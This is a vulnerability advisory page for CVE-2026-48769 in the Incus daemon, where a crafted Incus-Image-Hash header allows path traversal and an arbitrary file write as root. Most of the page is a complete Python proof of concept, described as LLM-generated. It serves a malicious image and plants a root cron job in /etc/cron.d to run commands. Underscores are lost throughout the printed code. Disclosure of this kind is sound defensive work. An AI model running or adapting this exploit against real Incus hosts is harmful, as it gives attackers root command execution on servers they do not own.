PT-2026-53016 · Go · Github.Com/Lxc/Incus/V7/Cmd/Incusd
Publicado
2026-06-26
·
Atualizado
2026-06-26
·
CVE-2026-48769
CVSS v3.1
9.9
Crítica
| Vetor | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Summary
An arbitrary file write exists in the Incus client when a malicious image server returns a crafted
Incus-Image-Hash header. This can lead to arbitrary command execution as root on the server.Details
cmd/incusd/images.go:611-684handlessource.type=urlby HEADing the user-supplied URL, readingIncus-Image-HashandIncus-Image-URL, and passing them toimageDownload()asAliasandServer.cmd/incusd/daemon images.go:91-92defaultsfpto the caller-controlled alias string.cmd/incusd/daemon images.go:333-335buildsdestName := filepath.Join(destDir, fp).cmd/incusd/daemon images.go:469-523enters thedirectprotocol branch, opensdestNamewithos.Create(), and copies the HTTP response into that file.cmd/incusd/daemon images.go:528-532validates the SHA-256 only after the file has already been created and populated.cmd/incusd/daemon images.go:337-344cleanup only runs after the copy returns; a slow or held response extends the arbitrary-write window.
A malicious image server returning something along the following will cause the arbitrary file write.
Incus-Image-Hash: ../../../../etc/cron.d/incus-direct-image-url-rce
Incus-Image-URL: http://attacker/payloadPoC
The script below creates a malicious image server and requests an Incus server to fetch the image. File write occurs when the image is unpacked.
The following script was generated by an LLM.
#!/usr/bin/env python3
"""Direct image URL hash path traversal to transient host cron write.
For `source.type=url`, Incus first HEADs an attacker-controlled URL and trusts the `Incus-Image-Hash` header as the expected fingerprint. The direct download path then creates `/var/lib/incus/images/<hash>` before validating that the hash is a real SHA-256 of the downloaded bytes. A hash containing `../` escapes the image directory.
Default mode is dry-run. With --execute-trigger this script starts a tiny HTTP server, returns a traversal hash pointing at cron, streams the cron payload, and keeps the response open so the daemon-side cleanup does not immediately remove the file.
"""
from future import annotations
import argparse
import http.client
import json
import shlex
import socket
import ssl
import sys
import threading
import time
import urllib.parse
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Any
DEFAULT SOCKET = "/var/lib/incus/unix.socket"
DEFAULT TRAVERSAL = "../../../../etc/cron.d/incus-direct-image-url-rce"
class UnixHTTPConnection(http.client.HTTPConnection):
def init (self, socket path: str, timeout: int = 120):
super(). init ("incus", timeout=timeout)
self.socket path = socket path
def connect(self) -> None:
sock = socket.socket(socket.AF UNIX, socket.SOCK STREAM)
sock.settimeout(self.timeout)
sock.connect(self.socket path)
self.sock = sock
class RCEHTTPServer(ThreadingHTTPServer):
hash path: str
advertise url: str
payload: bytes
hold seconds: int
payload requested: threading.Event
class DirectImageHandler(BaseHTTPRequestHandler):
protocol version = "HTTP/1.1"
server version = "direct-image-rce/1.0"
def log message(self, fmt: str, *args: Any) -> None:
print(f"[http] {self.address string()} - {fmt % args}", flush=True)
def do HEAD(self) -> None:
if self.path != "/stage":
self.send error(404)
return
srv = self.server
assert isinstance(srv, RCEHTTPServer)
self.send response(200)
self.send header("Incus-Image-Hash", srv.hash path)
self.send header("Incus-Image-URL", srv.advertise url.rstrip("/") + "/payload")
self.send header("Connection", "close")
self.end headers()
def do GET(self) -> None:
if self.path != "/payload":
self.send error(404)
return
srv = self.server
assert isinstance(srv, RCEHTTPServer)
srv.payload requested.set()
self.send response(200)
self.send header("Content-Type", "application/octet-stream")
self.send header("Cache-Control", "no-store")
self.end headers()
self.wfile.write(srv.payload)
self.wfile.flush()
print(f"[*] payload bytes written to daemon response; holding for {srv.hold seconds}s", flush=True)
time.sleep(srv.hold seconds)
self.close connection = True
def quote(value: str) -> str:
return urllib.parse.quote(value, safe="")
def tls context(args: argparse.Namespace) -> ssl.SSLContext:
if args.insecure:
ctx = ssl. create unverified context()
else:
ctx = ssl.create default context(cafile=args.cacert)
if args.cert:
ctx.load cert chain(args.cert, args.key)
return ctx
def connection(args: argparse.Namespace) -> http.client.HTTPConnection:
if args.url:
parsed = urllib.parse.urlparse(args.url)
if parsed.scheme != "https":
raise ValueError("--url must use https")
return http.client.HTTPSConnection(
parsed.hostname,
parsed.port or 8443,
timeout=args.timeout,
context=tls context(args),
)
return UnixHTTPConnection(args.socket, timeout=args.timeout)
def request json(
args: argparse.Namespace,
method: str,
path: str,
obj: dict[str, Any] | None,
allow error: bool = False,
) -> tuple[int, dict[str, Any]]:
body = None if obj is None else json.dumps(obj).encode("utf-8")
headers = {"Host": "incus"}
if body is not None:
headers["Content-Type"] = "application/json"
conn = connection(args)
conn.request(method, path, body=body, headers=headers)
resp = conn.getresponse()
raw = resp.read()
conn.close()
try:
data = json.loads(raw) if raw else {}
except json.JSONDecodeError:
data = {"raw": raw.decode("utf-8", "replace")}
if not allow error and (resp.status >= 400 or data.get("type") == "error"):
raise RuntimeError(f"{method} {path} failed with HTTP {resp.status}: {data}")
return resp.status, data
def images path(project: str) -> str:
return "/1.0/images?project=" + quote(project)
def cron payload(command: str) -> bytes:
return f"* * * * * root /bin/sh -c {shlex.quote(command)}
".encode("utf-8")
def image url body(project url: str, public: bool) -> dict[str, Any]:
return {
"source": {
"type": "url",
"url": project url.rstrip("/") + "/stage",
},
"public": public,
}
def start server(args: argparse.Namespace, payload: bytes) -> RCEHTTPServer:
server = RCEHTTPServer((args.listen host, args.listen port), DirectImageHandler)
server.hash path = args.hash path
server.advertise url = args.advertise url
server.payload = payload
server.hold seconds = args.hold seconds
server.payload requested = threading.Event()
thread = threading.Thread(target=server.serve forever, daemon=True)
thread.start()
return server
def main() -> int:
parser = argparse.ArgumentParser(description="Incus direct image URL hash traversal cron RCE PoC")
parser.add argument("--socket", default=DEFAULT SOCKET, help="Incus Unix socket")
parser.add argument("--url", help="remote Incus URL, for example https://host.ctf:8443")
parser.add argument("--cert", help="client certificate for remote Incus")
parser.add argument("--key", help="client private key for remote Incus")
parser.add argument("--cacert", help="CA certificate for remote Incus")
parser.add argument("--insecure", action="store true", help="disable TLS verification")
parser.add argument("--timeout", type=int, default=120, help="Incus request timeout")
parser.add argument("--project", default="default", help="project used for image import")
parser.add argument("--public", action="store true", help="mark imported image public")
parser.add argument("--listen-host", default="0.0.0.0", help="HTTP listen address")
parser.add argument("--listen-port", type=int, default=8088, help="HTTP listen port")
parser.add argument("--advertise-url", default="http://127.0.0.1:8088", help="URL reachable by the Incus daemon")
parser.add argument("--hash-path", default=DEFAULT TRAVERSAL, help="value returned in Incus-Image-Hash")
parser.add argument("--hold-seconds", type=int, default=90, help="keep payload response open for this many seconds")
parser.add argument("--command", default="id > /tmp/incus-direct-image-url-rce", help="command cron should run")
parser.add argument("--execute-trigger", action="store true", help="start server and trigger POST /1.0/images")
parser.add argument("--yes-i-understand-this-writes-host-file", action="store true", help="required with --execute-trigger")
args = parser.parse args()
if bool(args.cert) != bool(args.key):
parser.error("--cert and --key must be supplied together")
if args.execute trigger and not args.yes i understand this writes host file:
parser.error("--execute-trigger requires --yes-i-understand-this-writes-host-file")
payload = cron payload(args.command)
trigger body = image url body(args.advertise url, args.public)
print("[*] exploit primitive: direct image URL unvalidated hash path host write")
print(f"[*] HEAD URL served to daemon: {args.advertise url.rstrip()}/stage")
print(f"[*] returned Incus-Image-Hash: {args.hash path}")
print(f"[*] returned Incus-Image-URL: {args.advertise url.rstrip()}/payload")
print(f"[*] expected escaped host target from default Incus dir: /etc/cron.d/incus-direct-image-url-rce")
print(f"[*] cron payload: {payload.decode().rstrip()}")
print(f"[*] trigger body: {json.dumps(trigger body, sort keys=True)}")
if not args.execute trigger:
print("[*] dry run only; pass --execute-trigger and --yes-i-understand-this-writes-host-file to test")
return 0
server = start server(args, payload)
print(f"[*] HTTP server listening on {args.listen host}:{args.listen port}")
status, data = request json(args, "POST", images path(args.project), trigger body, allow error=True)
print(f"[*] POST /1.0/images HTTP {status}: {json.dumps(data, indent=2, sort keys=True)}")
if server.payload requested.wait(timeout=min(args.hold seconds, 30)):
print("[*] daemon requested payload; cron file should exist until the held response is released")
else:
print("[!] daemon did not request payload within the wait window")
print("[*] leaving HTTP server active for the remaining hold window")
time.sleep(max(0, args.hold seconds - 30))
server.shutdown()
server.server close()
return 0
if name == " main ":
try:
raise SystemExit(main())
except BrokenPipeError:
raise SystemExit(1)
except Exception as exc:
print(f"[-] {exc}", file=sys.stderr)
raise SystemExit(1)Impact
An arbitrary file write on the client with root privileges; possibly leading to arbitrary command execution.
Correção
RCE
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Github.Com/Lxc/Incus/V7/Cmd/Incusd